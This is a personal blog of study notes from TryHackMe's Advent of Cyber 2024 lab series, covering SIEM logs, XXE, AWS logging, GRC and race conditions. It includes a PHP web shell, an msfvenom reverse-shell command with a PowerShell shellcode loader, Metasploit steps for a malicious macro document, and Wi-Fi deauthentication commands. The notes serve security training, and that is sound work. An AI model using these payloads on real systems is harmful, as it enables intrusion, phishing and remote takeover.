Advent of Cyber 2024

KISHORERAM
42 min readJan 4, 2025

--

This blog covers everything I learned during the Advent of Cyber 2024 on TryHackMe.It highlights the key concepts, tools, and techniques I explored.

Source : Tryhackme

DAY 1

Photo by Alex Kotliarskyi on Unsplash

How to investigate malicious link files
Usually websites that supply copyrighted content have these significant risks,

  • Malvertising: Many sites contain malicious ads that can exploit vulnerabilities in a user’s system, which could lead to infection.
  • Phishing scams: Users can be tricked into providing personal or sensitive information via fake surveys or offers.
  • Bundled malware: Some converters may come with malware, tricking users into unknowingly running it.
  • File command is used to determine the type of a file. It examines the file’s content rather than its extension to identify its type.
  • Exiftool is a powerful, open-source command-line utility used for reading, writing, and editing metadata in various types of files, especially images, videos, and audio files. Metadata includes information such as the file's creation date, author, camera settings, GPS location.

Introduction to OPSEC

Operational Security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before the attacker can learn their identity.

In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:

  • Reusing usernames, email addresses, or account handles across multiple platforms. One might assume that anyone trying to cover their tracks would remove such obvious and incriminating information, but sometimes, it’s due to vanity or simply forgetfulness.
  • Using identifiable metadata in code, documents, or images, which may reveal personal information like device names, GPS coordinates, or timestamps.
  • Posting publicly on forums or GitHub (Like in this current scenario) with details that tie back to their real identity or reveal their location or habits.
  • Failing to use a VPN or proxy while conducting malicious activities allows law enforcement to track their real IP address.

For example, here are some real-world OPSEC mistakes that led to some really big fails:

  • AlphaBay Admin Takedown
  • Chinese Military Hacking Group (APT1)

These failures provided enough information for cyber security researchers and law enforcement to publicly identify group members.

DAY 2 & 3

Explored Elastic SIEM for log analysis. Also Encoded PowerShell commands are generally Base64 Encoded and can be decoded using tools such as CyberChef.

Elastic stack — Elastic stack is the collection of different open source components linked together to help users take the data from any source and in any format and perform a search, analyze and visualize the data in real-time.

Elasticsearch

Elasticsearch is a full-text search and analytics engine used to store JSON-formated documents. Elasticsearch is an important component used to store, analyze, perform correlation on the data, etc. Elasticsearch supports RESTFul API to interact with the data.

Logstash

Logstash is a data processing engine used to take the data from different sources, apply the filter on it or normalize it, and then send it to the destination which could be Kibana or a listening port. A logstash configuration file is divided into three parts, as shown below.

The input part is where the user defines the source from which the data is being ingested. Logstash supports many input plugins as shown in the reference https://www.elastic.co/guide/en/logstash/8.1/input-plugins.html

The filter part is where the user specifies the filter options to normalize the log ingested above. Logstash supports many filter plugins as shown in the reference documentation https://www.elastic.co/guide/en/logstash/8.1/filter-plugins.html

The Output part is where the user wants the filtered data to send. It can be a listening port, Kibana Interface, elasticsearch database, a file, etc. Logstash supports many Output plugins as shown in the reference documentation https://www.elastic.co/guide/en/logstash/8.1/output-plugins.html

Beats

Beats is a host-based agent known as Data-shippers that is used to ship/transfer data from the endpoints to elasticsearch. Each beat is a single-purpose agent that sends specific data to the elasticsearch. All available beats are shown below.

Kibana

Kibana is a web-based data visualization that works with elasticsearch to analyze, investigate and visualize the data stream in real-time. It allows the users to create multiple visualizations and dashboards for better visibility.

How they work together:

Source : Tryhackme
  • Beats is a set of different data shipping agents used to collect data from multiple agents. Like Winlogbeat is used to collect windows event logs, Packetbeat collects network traffic flows.
  • Logstash collects data from beats, ports or files, etc., parses/normalizes it into field value pairs, and stores them into elasticsearch.
  • Elasticsearch acts as a database used to search and analyze the data.
  • Kibana is responsible for displaying and visualizing the data stored in elasticsearch. The data stored in elasticseach can easily be shaped into different visualizations, time charts, infographics, etc., using Kibana.

Kibana is an integral component of Elastic stack that is used to display, visualize and search logs. Some of the important tabs are

  • Discover tab
  • Visualization
  • Dashboard

Kibana Discover tab is a place where analyst spends most of their time. This tab shows the ingested logs (also known as documents), the search bar, normalized fields, etc. Here analysts can perform the following tasks:

  • Search for the logs
  • Investigate anomalies
  • Apply filter based on
  • search term
  • Time period

Discover Tab

Discover tab within the Kibana interface contains the logs being ingested manually or in real-time, the time-chart, normalized fields, etc. Analysts use this tab mostly to search/investigate the logs using the search bar and filter options.

Some key information available in a dashboard interface are

  1. Logs (document): Each log here is also known as a single document containing information about the event. It shows the fields and values found in that document.
  2. Fields pane: Left panel of the interface shows the list of the fields parsed from the logs. Wecan click on any field to add the field to the filter or remove it from the search.
  3. Index Pattern: Let the user select the index pattern from the available list.
  4. Search bar: A place where the user adds search queries / applies filters to narrow down the results.
  5. Time Filter: We can narrow down results based on the time duration. This tab has many options to select from to filter/limit the logs.
  6. Time Interval: This chart shows the event counts over time.
  7. TOP Bar: This bar contains various options to save the search, open the saved searches, share or save the search, etc.

Kibana by default requires an index pattern to access the data stored/being ingested in the elasticsearch. Index pattern tells Kibana which elasticsearch data we want to explore. Each Index pattern corresponds to certain defined properties of the fields. A single index pattern can point to multiple indices. Each log source has a different log structure; therefore, when logs are ingested in the elasticsearch, they are first normalized into corresponding fields and values by creating a dedicated index pattern for the data source.

Left Panel — Fields :The left panel of the Kibana interface shows the list of the normalized fields it finds in the available documents/logs. Click on any field, and it will show the top 5 values and the percentage of the occurrence. We can use these values to apply filters to them. Clicking on the + button will add a filter to show the logs containing this value, and the — button will apply the filter on this value to show the results that do not have this value.

KQL (Kibana Query Language) is a search query language used to search the ingested logs/documents in the elasticsearch. Apart from the KQL language, Kibana also supports Lucene Query Language. We can disable the KQL query as shown below.

With KQL, we can search for the logs in two different ways.

  • Free text search
  • Field-based search

Free text Search - Free text search allows users to search for the logs based on the text-only. That means a simple search of the term security will return all the documents that contain this term, irrespective of the field. KQL looks for the whole term/word in the documents.

WILD CARD - KQL allows the wild card * to match parts of the term/word. Logical Operators (AND | OR | NOT) - KQL also allows users to utilize the logical operators in the search query.

Field-based search — In the Field-based search, we will provide the field name and the value we are looking for in the logs. This search has a special syntax as FIELD : VALUE. It uses a colon : as a separator between the field and the value.

Correlation Option- creating correlations between multiple fields in visualization Tab . Dragging the required field in the middle will create a correlation tab in the visualization tab.

Example PHP file which could be uploaded to exploit RCE via File Upload

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
Source : Tryhackme

DAY 4

Detection gaps are usually for one of two main reasons:

  • Security is a cat-and-mouse game. As we detect more, the threat actors and red teamers will find new sneaky ways to thwart our detection. We then need to study these novel techniques and update our signature and alert rules to detect these new techniques.
  • The line between anomalous and expected behaviour is often very fine and sometimes even has significant overlap. For example, let’s say we are a company based in the US. We expect to see almost all of our logins come from IP addresses in the US. One day, we get a login event from an IP in the EU, which would be an anomaly. However, it could also be our CEO travelling for business. This is an example where normal and malicious behaviour intertwine, making it hard to create accurate detection rules that would not have too much noise.

All cyber attacks follow a fairly standard process, which is explained quite well by the Unified Cyber Kill chain

As a blue teamer, it would be our dream to prevent all attacks at the start of the kill chain. So even just when threat actors start their reconnaissance, we already stop them dead in their tracks. But, as discussed before, this is not possible. The goal then shifts slightly. If we are unable to fully detect and prevent a threat actor at any one phase in the kill chain, the goal becomes to perform detections across the entire kill chain.

A popular framework for understanding the different techniques and tactics that threat actors perform through the kill chain is the MITRE ATT&CK framework. The framework is a collection of tactics, techniques, and procedures that have been seen to be implemented by real threat actors. The framework provides a navigator tool where these TTPs can be investigated.

However, the framework primarily discusses these TTPs in a theoretical manner. Even if we know we have a gap for a specific TTP, we don’t really know how to test the gap or close it down. This is where the Atomic red team is used.

The Atomic Red Team library is a collection of red team test cases that are mapped to the MITRE ATT&CK framework. The library consists of simple test cases that can be executed by any blue team to test for detection gaps and help close them down. The library also supports automation, where the techniques can be automatically executed. However, it is also possible to execute them manually.

Source : Tryhackme
Source : Tryhackme

DAY 5

Extensible Markup Language (XML)

XML is a commonly used method to transport and store data in a structured format that humans and machines can easily understand. Consider a scenario where two computers need to communicate and share data. Both devices need to agree on a common format for exchanging information.

Document Type Definition (DTD)

DTD is a set of rules that defines the structure of an XML document. Just like a database scheme, it acts like a blueprint, telling you what elements (tags) and attributes are allowed in the XML file.

For example, if we want to ensure that an XML document about people will always include a name, address, email, and phone number, we would define those rules through a DTD as shown below:

<!DOCTYPE people [
<!ELEMENT people(name, address, email, phone)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT address (#PCDATA)>
<!ELEMENT email (#PCDATA)>
<!ELEMENT phone (#PCDATA)>
]>

In the above DTD, <!ELEMENT> defines the elements (tags) that are allowed, like name, address, email, and phone, whereas #PCDATA stands for parsed people data, meaning it will consist of just plain text.

Entities

Entities in XML are placeholders that allow the insertion of large chunks of data or referencing internal or external files. They assist in making the XML file easy to manage, especially when the same data is repeated multiple times. Entities can be defined internally within the XML document or externally, referencing data from an outside source.

XML External Entity (XXE)

XXE is an attack that takes advantage of how XML parsers handle external entities. When a web application processes an XML file that contains an external entity, the parser attempts to load or execute whatever resource the entity points to. If necessary sanitisation is not in place, the attacker may point the entity to any malicious source/code causing the undesired behaviour of the web app.

Vulnerable php code in the challenge

<?php
..
...
libxml_disable_entity_loader(false);
$wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT);

...
..
echo "Item added to your wishlist successfully.";
?>

Preventive measures to address the potential risks against XXE attacks:

  • Disable External Entity Loading: The primary fix is to disable external entity loading in your XML parser. In PHP, for example, you can prevent XXE by setting libxml_disable_entity_loader(true) before processing the XML.
  • Validate and Sanitise User Input: Always validate and sanitise the XML input received from users. This ensures that only expected data is processed, reducing the risk of malicious content being included in the request. For example, remove suspicious keywords like /etc/host, /etc/passwd, etc, from the request.

What are the types of XXE attacks?

There are various types of XXE attacks:

  • Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application’s response.
  • Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.
  • Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.
  • Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

In-Band XXE — The attacker receives the response directly through the same channel (in-band) as the original request. The vulnerable application itself returns the extracted data to the attacker.

Out-of-Band (OOB) XXE — The attacker uses a secondary channel (out-of-band) to exfiltrate data. The vulnerable system sends the data to an external server controlled by the attacker.

DAY 6

Reverse Engineering & Debugging

  • Ghidra: NSA-developed open-source reverse engineering suite.
  • x64dbg: Open-source debugger for x64 and x32 binaries.
  • OllyDbg: Debugger for assembly-level reverse engineering.
  • Radare2: Open-source platform for reverse engineering.
  • Binary Ninja: Tool for disassembling and decompiling binaries.
  • PEiD: Detection tool for packers, cryptors, and compilers.

Disassemblers & Decompilers

  • CFF Explorer: PE editor for analyzing and editing Portable Executable files.
  • Hopper Disassembler: Debugger, disassembler, and decompiler.
  • RetDec: Open-source decompiler for machine code.

Static & Dynamic Analysis

  • Process Hacker: Memory editor and process watcher.
  • PEview: PE file viewer for analysis.
  • Dependency Walker: Displays executable DLL dependencies.
  • DIE (Detect It Easy): Packer, compiler, and cryptor detection tool.

Forensics & Incident Response

  • Volatility: RAM dump analysis framework for memory forensics.
  • Rekall: Memory forensics framework for incident response.
  • FTK Imager: Disk image acquisition and analysis tools for forensics.

Network Analysis

  • Wireshark: Network protocol analyzer for traffic examination.
  • Nmap: Vulnerability detection and network mapping tool.
  • Netcat: Tool for reading and writing data across network connections.

File Analysis

  • FileInsight: Program for examining and editing binary files.
  • Hex Fiend: Quick and light hex editor.
  • HxD: Hex editor for binary file viewing and editing.

Scripting & Automation

  • Python: Automation-focused modules and tools.
  • PowerShell Empire: Framework for PowerShell post-exploitation.

Sysinternals Suite

  • Autoruns: Shows executables configured to run at boot.
  • Process Explorer: Provides information about running processes.
  • Process Monitor: Monitors real-time process/thread activity.

Commonly used tool for investigation

Detecting Sandboxes

A sandbox is an isolated environment where (malicious) code is executed without affecting anything outside the system. Often, multiple tools are installed to monitor, record, and analyze the code’s behaviour. Malware needs to check if it is running on a Sandbox environment. If it is, then it should not continue with its malicious activity. To do so, malware has settled on one technique, which checks if the directory C:\Program Files is present by querying the Registry path HKLM\\Software\\Microsoft\\Windows\\CurrentVersion

YARA is a tool used to identify and classify malware based on patterns in its code. By writing custom rules, analysts can define specific characteristics to look for — such as particular strings, file headers, or behaviours — and YARA will scan files or processes to find matches, making it invaluable for detecting malicious code.

To avoid detected by YARA Rules malware obfuscates itself to become stealthier by encoding its commands.

While obfuscation is helpful, we also need to know that there are tools available that extract obfuscated strings from malware binaries. One such tool is Floss, a powerful tool developed by Mandiant that functions similarly to the Linux strings tool but is optimized for malware analysis, making it ideal for revealing any concealed details.

DAY 7

CloudWatch

AWS CloudWatch is a monitoring and observability platform that gives us greater insight into our AWS environment by monitoring applications at multiple levels. CloudWatch provides functionalities such as the monitoring of system and application metrics and the configuration of alarms on those metrics for the purposes of today’s investigation, though we want to focus specifically on CloudWatch logs. Running an application in a cloud environment can mean leveraging lots of different services (e.g. a service running the application, a service running functions triggered by that application, a service running the application backend, etc.); this translates to logs being generated from lots of different sources. CloudWatch logs make it easy for users to access, monitor and store the logs from all these various sources. A CloudWatch agent must be installed on the appropriate instance for application and system metrics to be captured.

  • Log Events: A log event is a single log entry recording an application “event”; these will be timestamped and packaged with log messages and metadata.
  • Log Streams: Log streams are a collection of log events from a single source.
  • Log Groups: Log groups are a collection of log streams. Log streams are collected into a log group when logically it makes sense, for example, if the same service is running across multiple hosts.

CloudTrail

CloudWatch can track infrastructure and application performance, but what if you wanted to monitor actions in your AWS environment? These would be tracked using another service called AWS CloudTrail. Actions can be those taken by a user, a role (granted to a user giving them certain permissions) or an AWS service and are recorded as events in AWS CloudTrail. Essentially, any action the user takes (via the management console or AWS CLI) or service will be captured and stored. Some features of CloudTrail include:

  • Always On: CloudTrail is enabled by default for all users
  • JSON-formatted: All event types captured by CloudTrail will be in the CloudTrail JSON format
  • Event History: When users access CloudTrail, they will see an option “Event History”, event history is a record of the actions that have taken place in the last 90 days. These records are queryable and can be filtered on attributes such as “resource” type.
  • Trails: The above-mentioned event history can be thought of as the default “trail,” included out of the box. However, users can define custom trails to capture specific actions, which is useful if you have bespoke monitoring scenarios you want to capture and store beyond the 90-day event history retention period.
  • Deliverable: As mentioned, CloudWatch can be used as a single access point for logs generated from various sources; CloudTrail is no different and has an optional feature enabling CloudTrail logs to be delivered to CloudWatch.

Cloudtrail helps capture and record actions taken. These actions could be interactions with any number of AWS services. For example, services like S3 (Amazon Simple Storage Service used for object storage) and IAM (AWS’s Identity and Access Management service can be used to secure access to your AWS environment with the creation of identities and the assigning of access permissions to those identities) will have actions taken within their service recorded. These recorded events can be very helpful when performing an investigation.

jq is a powerful, lightweight, and flexible command-line tool used to process, manipulate, and query JSON (JavaScript Object Notation) data. It works similarly to tools like sed or awk but is specifically designed for JSON, making it an essential utility for developers, system administrators, and data analysts who work with JSON-formatted data.

Why Use jq?

  • Efficiency: Handles large JSON files quickly.
  • Flexibility: Supports advanced filtering, modification, and transformation of JSON.
  • Portability: Works across Linux, macOS, and Windows.

1. Pretty-Print JSON:

Formats JSON for better readability.

jq . data.json

Output:

{
"name": "Alice",
"age": 25,
"skills": ["Python", "JavaScript"]
}

2. Extract a Specific Field:

Extracts a specific key’s value from the JSON

jq '.name' data.json

Output:

"Alice"

3. Filter Based on Conditions:

Filters JSON data based on specific criteria.

jq 'select(.age > 20)' data.json

4. Iterate Over Arrays:

Processes each element in a JSON array.

jq '.skills[]' data.json

Output:

"Python"
"JavaScript"

5. Modify JSON Data:

Adds or changes fields in the JSON.

jq '. + {"location": "USA"}' data.json

Output

{
"name": "Alice",
"age": 25,
"skills": ["Python", "JavaScript"],
"location": "USA"
}

DAY 8

Shellcode: A piece of code usually used by malicious actors during exploits like buffer overflow attacks to inject commands into a vulnerable system, often leading to executing arbitrary commands or giving attackers control over a compromised machine. Shellcode is typically written in assembly language and delivered through various techniques, depending on the exploited vulnerability.

To generate a shellcode to see what it looks like. To do this, we will use a tool called msfvenom to get a reverse shell.msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell

Where Is the Actual Shellcode

The actual shellcode in the output above is the hex-encoded byte array, which starts with 0xfc, 0xe8, 0x82, and so on. The hexadecimal numbers represent the instructions set on the target machine. Computers understand binary (1s and 0s), but hex numbers are just a more human-readable version. So, instead of seeing long strings of 1s and 0s, you see something like 0xfc instead.

we will use PowerShell to call a few Windows APIs via C# code. Below is a simple PowerShell script that will execute our shellcode:

$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;

public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@

Add-Type $VrtAlloc

$WaitFor= @"
using System;
using System.Runtime.InteropServices;

public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@

Add-Type $WaitFor

$CrtThread= @"
using System;
using System.Runtime.InteropServices;

public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

}
"@
Add-Type $CrtThread

[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

Explanation of the Code

The script starts by defining a few C# classes. These classes use the DllImport attribute to load specific functions from the kernel32 DLL, which is part of the Windows API.

  • VirtualAlloc: This function allocates memory in the process's address space. It's commonly used in scenarios like this to prepare memory for storing and executing shellcode.
  • CreateThread: This function creates a new thread in the process. The thread will execute the shellcode that has been loaded into memory.
  • WaitForSingleObject: This function pauses execution until a specific thread finishes its task. In this case, it ensures that the shellcode has completed execution.

These classes are then added to PowerShell using the Add-Type command, allowing PowerShell to use these functions.

Storing the Shellcode in a Byte Array

Next, the script stores the shellcode in the $buf variable, a byte array. In the example above, SHELLCODE_PLACEHOLDER is just there to show where you would insert the actual shellcode earlier generated through msfvenom. Usually, you'd replace it with the real shellcode, represented as a series of hexadecimal values. These hex values are the instructions that will be executed when the shellcode runs.

Allocating Memory for the Shellcode

The VirtualAlloc function then allocates a block of memory where the shellcode will be stored. The script uses the following arguments:

  • 0 for the memory address, meaning that Windows will decide where to allocate the memory.
  • $size for the size of the memory block, which is determined by the length of the shellcode.
  • 0x3000 for the allocation type, which tells Windows to reserve and commit the memory.
  • 0x40 for memory protection, the memory is readable and executable (necessary for executing shellcode).

After memory is allocated, the Marshal.Copy function copies the shellcode from the $buf array into the allocated memory address ($addr), preparing it for execution.

Executing the Shellcode and Waiting for Completion

Once the shellcode is stored in memory, the script calls the CreateThread function to execute the shellcode by creating a new thread. This thread is instructed to start execution from the memory address where the shellcode is located ($addr). The script then uses the WaitForSingleObject function, ensuring it waits for the shellcode execution to finish before continuing. This makes sure that the shellcode runs completely before the script ends its execution.

 nc -nvlp port  # Reverse shell listening

DAY 9

Governance, Risk, and Compliance (GRC) plays a crucial role in any organisation to ensure that their security practices align with their personal, regulatory, and legal obligations. Although in general good security practices help protect a business from suffering a breach, depending on the sector in which an organisation operates, there may be external security regulations that it needs to adhere to.

Governance is the function that creates the framework that an organisation uses to make decisions regarding information security. Governance is the creation of an organisation’s security strategy, policies, standards, and practices in alignment with the organisation’s overall goal. Governance also defines the roles and responsibilities that everyone in the organisation has to play to help ensure these security standards are met.

Risk is the function that helps to identify, assess, quantify, and mitigate risk to the organisation’s IT assets. Risk helps the organisation understand potential threats and vulnerabilities and the impact that they could have if a threat actor were to execute or exploit them. By simply turning on a computer, an organisation has some level of risk of a cyber attack. The risk function is important to help reduce the overall risk to an acceptable level and develop contingency plans in the event of a cyber attack where a risk is realised.

Compliance is the function that ensures that the organisation adheres to all external legal, regulatory, and industry standards. For example, adhering to the GDPR law or aligning the organisation’s security to an industry standard such as NIST or ISO 27001.

Risk Assessments

It’s a process to identify potential problems before they happen. Think of it as checking the weather before going on a hike; if there’s a storm coming, you’d want to know ahead of time so you can either prepare or change your plans.Risk assessments are like a reality check for businesses. They connect cyber security to the bigger picture, which minimises business risk. In other words, it’s not just about securing data but about protecting the business as a whole. Imagine you run an online store that collects customer information like names, addresses, and credit card details. If that data gets stolen because of a weak security system, it’s not just the data that’s at risk — your reputation, customer trust, and even your profits are on the line. A risk assessment could have helped you identify that weak point and fix it before anything went wrong.

Identification of Risks

Assigning Likelihood to Each Risk

To quantify risk, we need to identify how likely or probable it is that the risk will materialise. We can then assign a number to quantify this likelihood. This number is often on a scale of 1 to 5. The exact scale differs from organisation to organisation and from framework to framework. Likelihood can also be called the probability of materialisation of a risk. An example scale for likelihood can be:

  1. Improbable: So unlikely that it might never happen.
  2. Remote: Very unlikely to happen, but still, there is a possibility.
  3. Occasional: Likely to happen once/sometime.
  4. Probable: Likely to happen several times.
  5. Frequent: Likely to happen often and regularly.

Assigning Impact to Each Risk

Once we have identified the risks and the likelihood of a risk, the next step is to quantify the impact this risk’s materialisation might have on the organisation. For example, if there is a public-facing web server that is unpatched and gets breached, what will be the impact on the organisation?Different organisations calculate impact in different ways. Some organisations might use the CVSS scoring to calculate the impact of a risk; others might use their own rating derived from the Confidentiality, Integrity, and Availability of a certain asset, and others might base it on the severity categorisation of the incidents. Similar to likelihood, we also quantify impact, often on a scale of 1 to 5. An example scale of impact can be based on the following definitions.

  1. Informational: Very low impact, almost non-existent.
  2. Low: Impacting a limited part of one area of the organisation’s operations, with little to no revenue loss.
  3. Medium: Impacting one part of the organisation’s operations completely, with major revenue loss.
  4. High: Impacting several parts of the organisation’s operations, causing significant revenue loss
  5. Critical: Posing an existential threat to the organisation.

Risk Ownership

Some risk registers make use of more advanced rating systems such as DREAD. Assigning scores to the risks helps organisations prioritise which risks should be remediated first.we decide who owns the risks that were identified. These team members are then responsible for performing an additional investigation into what the cost would be to close the risk vs what we could lose if the risk is realised. In cases where the cost of security is lower, we can mitigate the risk with more security controls. However, were it is higher, we can accept the risk. Accepted risks should always be documented and reviewed periodically to ensure that the cost has not changed.

DAY 10

Use the Metasploit Framework to create the document with the malicious macro. This requires the following commands:

  • Open a new terminal window and run msfconsole to start the Metasploit Framework
  • set payload windows/meterpreter/reverse_tcp specifies the payload to use; in this case, it connects to the specified host and creates a reverse shell
  • use exploit/multi/fileformat/office_word_macro specifies the exploit you want to use. Technically speaking, this is not an exploit; it is a module to create a document with a macro
  • set LHOST CONNECTION_IP specifies the IP address of the attacker’s system, CONNECTION_IP in this case is the IP of the AttackBox
  • set LPORT 8888 specifies the port number you are going to listen on for incoming connections on the AttackBox
  • show options shows the configuration options to ensure that everything has been set properly, i.e., the IP address and port number in this example
  • exploit generates a macro and embeds it in a document
  • exit to quit and return to the terminal.

We again will use the Metasploit Framework, but this time to listen for incoming connections when a target users opens our phishing Word document. This requires the following commands:

  • Open a new terminal window and run msfconsole to start the Metasploit Framework
  • use multi/handler to handle incoming connections
  • set payload windows/meterpreter/reverse_tcp to ensure that our payload works with the payload used when creating the malicious macro
  • set LHOST CONNECTION_IP specifies the IP address of the attacker’s system and should be the same as the one used when creating the document
  • set LPORT 8888 specifies the port number you are going to listen on and should be the same as the one used when creating the document
  • show options to confirm the values of your options
  • exploit starts listening for incoming connections to establish a reverse shell.

DAY 11

Command iw dev. This will show any wireless devices and their configuration that we have available for us to use. To scan for nearby Wi-Fi networks using our wlan2 device. We can use sudo iw dev wlan2 scan. The dev wlan2 specifies the wireless device you want to work with, and scan tells iw to scan the area for available Wi-Fi networks.

Monitor mode is a special mode primarily used for network analysis and security auditing. In this mode, the Wi-Fi interface listens to all wireless traffic on a specific channel, regardless of whether it is directed to the device or not. It passively captures all network traffic within range for analysis without joining a network.

sudo iw dev wlan2 scan
sudo ip link set dev wlan2 down
sudo iw dev wlan2 set type monitor
sudo ip link set dev wlan2 up
sudo iw dev wlan2 info

we start by capturing Wi-Fi traffic in the area, specifically targeting the WPA handshake packets. We can do this with the command sudo airodump-ng wlan2. This command provides a list of nearby Wi-Fi networks (SSIDs) and shows important details like signal strength, channel, and encryption type.

we will launch the deauthentication attack. Because the client is already connected, we want to force them to reconnect to the access point, forcing it to send the handshake packets. We can break this down into 3 simple steps:

  1. Deauthentication packets: The tool aireplay-ng sends deauthentication packets to either a specific client (targeted attack) or to all clients connected to an access point (broadcast attack). These packets are essentially “disconnect” commands that force the client to drop its current Wi-Fi connection.
  2. Forcing a reconnection: When the client is disconnected, it automatically tries to reconnect to the Wi-Fi network. During this reconnection, the client and access point perform the 4-way handshake as part of the reauthentication process.
  3. Capturing the handshake: This is where airodump-ng comes into play because it will capture this handshake as it happens, providing the data needed to attempt the WPA/WPA2 cracking.

We can do this with sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2. The -0 flag indicates that we are using the deauthentication attack, and the 1 value is the number of deauths to send. The -a indicates the BSSID of the access point and -c indicates the BSSID of the client to deauthenticate.

DAY 12

This is one of the interesting rooms in Tryhackme regarding the race conditions vulnerability. A key difference in web timing attacks between HTTP/1.1 and HTTP/2 is that HTTP/2 supports a feature called single-packet multi-requests. Network latency, the amount of time it takes for the request to reach the web server, made it difficult to identify web timing issues. It was hard to know whether the time difference was due to a web timing vulnerability or simply a network latency difference. However, with single-packet multi-requests, we can stack multiple requests in the same TCP packet, eliminating network latency from the equation, meaning time differences can be attributed to different processing times for the requests.Race conditions are a subset of web timing attacks that are even more special. With a race condition attack, we are no longer simply looking to gain access to information but can cause the web application to perform unintended actions on our behalf.

Timing attacks can often be divided into two main categories:

  • Information Disclosures
  • Race Conditions

Time-of-Check to Time-of-Use (TOCTOU) flaw

Using burp intruder after intercepting the request.Now that we have 10 requests ready, we want to send them simultaneously. While one option is to manually click the Send button in each tab individually, we aim to send them all in parallel. To do this, click the + icon next to Request #10 and select Create tab group. This will allow us to group all the requests together for easier management and execution in parallel. we are ready to launch multiple copies of our HTTP POST requests simultaneously to exploit the race condition vulnerability. Select Send group in parallel (last-byte sync) in the dropdown next to the Send button. Once selected, the Send button will change to Send group (parallel). Click this button to send all the duplicated requests in our tab group at the same time. Using this we exploited race condition vulnerability.

Since these updates are committed separately and not part of a single atomic transaction, there’s no locking or proper synchronisation between these operations. This lack of a transaction or locking mechanism makes the code vulnerable to race conditions, as concurrent requests could interfere with the balance updates.

Fixing the Race

  • Use Atomic Transactions: The developer should have implemented atomic database transactions to ensure that all steps of a fund transfer (deducting and crediting balances) are performed as a single unit. This would ensure that either all steps of the transaction succeed or none do, preventing partial updates that could lead to an inconsistent state.
  • Implement Mutex Locks: By using Mutex Locks, the developer could have ensured that only one thread accesses the shared resource (such as the account balance) at a time. This would prevent multiple requests from interfering with each other during concurrent transactions.
  • Apply Rate Limits: The developer should have implemented rate limiting on critical functions like funds transfers and withdrawals. This would limit the number of requests processed within a specific time frame, reducing the risk of abuse through rapid, repeated requests.

DAY 13

WebSockets let your browser and the server keep a constant line of communication open. Unlike the old-school method of asking for something, getting a response, and then hanging up, WebSockets are like keeping the phone line open so you can chat whenever you need to. Once that connection is set up, the client and server can talk back and forth without all the extra requests. WebSockets are great for live chat apps, real-time games, or any live data feed where you want constant updates. After a quick handshake to get things started, both sides can send messages whenever. This means less overhead and faster communication when you need data flowing in real-time.

  • Weak Authentication and Authorisation: Unlike regular HTTP, WebSockets don’t have built-in ways to handle user authentication or session validation. If you don’t set these controls up properly, attackers could slip in and get access to sensitive data or mess with the connection.
  • Message Tampering: WebSockets let data flow back and forth constantly, which means attackers could intercept and change messages if encryption isn’t used. This could allow them to inject harmful commands, perform actions they shouldn’t, or mess with the sent data.
  • Cross-Site WebSocket Hijacking (CSWSH): This happens when an attacker tricks a user’s browser into opening a WebSocket connection to another site. If successful, the attacker might be able to hijack that connection or access data meant for the legitimate server.
  • Denial of Service (DoS): Because WebSocket connections stay open, they can be targeted by DoS attacks. An attacker could flood the server with a ton of messages, potentially slowing it down or crashing it altogether.

DAY 14

Public key: At its core, a certificate contains a public key, part of a pair of cryptographic keys: a public key and a private key. The public key is made available to anyone and is used to encrypt data.

Private key: The private key remains secret and is used by the website or server to decrypt the data.

Metadata: Along with the key, it includes metadata that provides additional information about the certificate holder (the website) and the certificate. You usually find information about the Certificate Authority (CA), subject (information about the website, e.g. www.meow.thm), a uniquely identifiable number, validity period, signature, and hashing algorithm.

CA is a trusted entity that issues certificates; for example, GlobalSign, Let’s Encrypt, and DigiCert are very common ones. The browser trusts these entities and performs a series of checks to ensure it is a trusted CA. Here is a breakdown of what happens with a certificate:

  • Handshake: Your browser requests a secure connection, and the website responds by sending a certificate, but in this case, it only requires the public key and metadata.
  • Verification: Your browser checks the certificate for its validity by checking if it was issued by a trusted CA. If the certificate hasn’t expired or been tampered with, and the CA is trusted, then the browser gives the green light. There are different types of checks you can do; check them here.
  • Key exchange: The browser uses the public key to encrypt a session key, which encrypts all communications between the browser and the website.
  • Decryption: The website (server) uses its private key to decrypt the session key, which is symmetric. Now that both the browser and the website share a secret key (session key), we have established a secure and encrypted communication!

Browsers generally do not trust self-signed certificates because there is no third-party verification. The browser has no way of knowing if the certificate is authentic or if it’s being used for malicious purposes (like a man-in-the-middle attack). Trusted CA certificates, on the other hand, are verified by a CA, which acts as a trusted third party to confirm the website’s identity.

DAY 15

